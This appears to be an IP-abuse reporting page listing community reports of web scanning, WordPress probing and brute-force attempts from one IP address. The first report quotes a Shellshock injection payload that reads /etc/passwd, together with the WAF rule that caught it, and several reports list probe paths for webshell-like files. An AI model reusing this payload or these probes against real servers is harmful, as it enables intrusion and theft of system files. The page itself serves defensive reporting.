๐บ๐ธ
TPI-Abuse
2026-10-02 06:52:45
(1 day ago)
(mod_security) mod_security (id:221260) triggered by 158.173.36.210 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:221260) triggered by 158.173.36.210 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Oct 02 02:52:36.561218 2026] [security2:error] [pid 12155:tid 12155] [client 158.173.36.210:32175] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||www.tulsatvmemories.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tulsatvmemories.com"] [uri "/test.cgi"] [unique_id "ar9UtKvvf6aVmgSGN1OZPwAAAEA"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ณ๐ฑ
Alt255
2026-09-27 19:39:32
(5 days ago)
[ti-03ov] Web exploit scanning: 1 suspicious requests detected by fail2ban jail apache-scanner. Exam ...
show more
[ti-03ov] Web exploit scanning: 1 suspicious requests detected by fail2ban jail apache-scanner. Example: 158.173.36.210 - - [27/Sep/2026:21:39:12 +0200] "GET /wp-content/plugins/buddypress/alfa.php HTTP/1.1" 301 501 "-" "Go-http-client/1.1"
...
show less
Bad Web Bot
Web App Attack
๐ฉ๐ช
filstal.org
2026-09-26 20:49:36
(6 days ago)
Bad bot activity detected (automated scraping/probing).
Bad Web Bot
Web App Attack
๐ช๐ธ
librebit
2026-09-20 18:39:53
(1 week ago)
Brute force
Brute-Force
๐ฎ๐น
VHosting
2026-09-17 21:10:03
(2 weeks ago)
Detected WordPress attack from different servers
Brute-Force
Web App Attack
Anonymous
2026-09-17 18:14:18
(2 weeks ago)
158.173.36.210 - - [17/Sep/2026:15:14:08 -0300] "GET /wp-content/themes/theme-check/main.php HTTP/1. ...
show more
158.173.36.210 - - [17/Sep/2026:15:14:08 -0300] "GET /wp-content/themes/theme-check/main.php HTTP/1.1" 301 162 "-" "Go-http-client/1.1"
158.173.36.210 - - [17/Sep/2026:15:14:12 -0300] "GET /wp-content/plugins/wp-cache-sys/index.php HTTP/1.1" 301 162 "-" "Go-http-client/1.1"
158.173.36.210 - - [17/Sep/2026:15:14:17 -0300] "GET /wp-content/themes/theme-check/theme-check.php HTTP/1.1" 301 162 "-" "Go-http-client/1.1"
...
show less
Port Scan
๐ฉ๐ช
FeG Deutschland
2026-09-15 10:05:47
(2 weeks ago)
Looking for CMS/PHP/SQL vulnerablilities/excessive crawling - 124
Exploited Host
Web App Attack
๐ฑ๐ป
garmtech.com
2026-08-01 05:17:55
(2 months ago)
IM360 WAF: WordPress wp2shell REST batch endpoint before 7.0.2 or 6.9.5 (CVE-2026-63030) MV:0
Hacking
Anonymous
2026-07-21 17:39:18
(2 months ago)
Multiple, malicious web requests detected
Port Scan
Hacking
๐บ๐ฆ
URAN Publishing Service
2026-07-21 14:57:49
(2 months ago)
158.173.36.210 - - [21/Jul/2026:17:57:48 +0300] "GET /wp-content/plugins/wpcall-button/button-image. ...
show more
158.173.36.210 - - [21/Jul/2026:17:57:48 +0300] "GET /wp-content/plugins/wpcall-button/button-image.php HTTP/1.1" 404 705 "-" "Go-http-client/1.1"
158.173.36.210 - - [21/Jul/2026:17:57:48 +0300] "GET /wp-content/plugins/index.php HTTP/1.1" 404 705 "-" "Go-http-client/1.1"
...
show less
Web App Attack
๐ซ๐ท
masterguru
2026-07-10 10:48:13
(2 months ago)
(modsec_5015) ModSec 5015: Suspicious User-Agent from 158.173.36.210 (ES/Spain/-): 1 in the last 360 ...
show more
(modsec_5015) ModSec 5015: Suspicious User-Agent from 158.173.36.210 (ES/Spain/-): 1 in the last 3600 secs (0-196)
show less
Hacking
๐ฌ๐ง
consul.to
2026-07-08 06:21:26
(2 months ago)
Web attack/malicious scanning detected
Web App Attack
๐ฉ๐ช
Nevermind
2026-06-25 05:57:06
(3 months ago)
158.173.36.210 - - [25/Jun/2026:07:57:05 +0200] "GET /wp-content/plugins/wpcall-button/button-image. ...
show more
158.173.36.210 - - [25/Jun/2026:07:57:05 +0200] "GET /wp-content/plugins/wpcall-button/button-image.php HTTP/1.1" 404 4803 "http://luett-huett.de/wp-content/plugins/wpcall-button/button-image.php" "Go-http-client/2.0"
158.173.36.210 - - [25/Jun/2026:07:57:05 +0200] "GET /wp-content/plugins/index.php HTTP/1.1" 404 4803 "http://luett-huett.de/wp-content/plugins/index.php" "Go-http-client/2.0"
158.173.36.210 - - [25/Jun/2026:07:57:06 +0200] "GET /wp-content/plugins/advanced-llms-txt-generator/assets/css/css_json.php HTTP/1.1" 404 4803 "http://luett-huett.de/wp-content/plugins/advanced-llms-txt-generator/assets/css/css_json.php" "Go-http-client/2.0"
158.173.36.210 - - [25/Jun/2026:07:57:06 +0200] "GET /wp-content/plugins/linkpreview/index.php HTTP/1.1" 404 4803 "http://luett-huett.de/wp-content/plugins/linkpreview/index.php" "Go-http-client/2.0"
...
show less
Web App Attack
๐ณ๐ฑ
Site.eu
2026-06-25 01:39:35
(3 months ago)
Excessive 404/403 errors
Brute-Force
๐ฌ๐ง
consul.to
2026-06-16 10:23:11
(3 months ago)
Web attack/malicious scanning detected
Web App Attack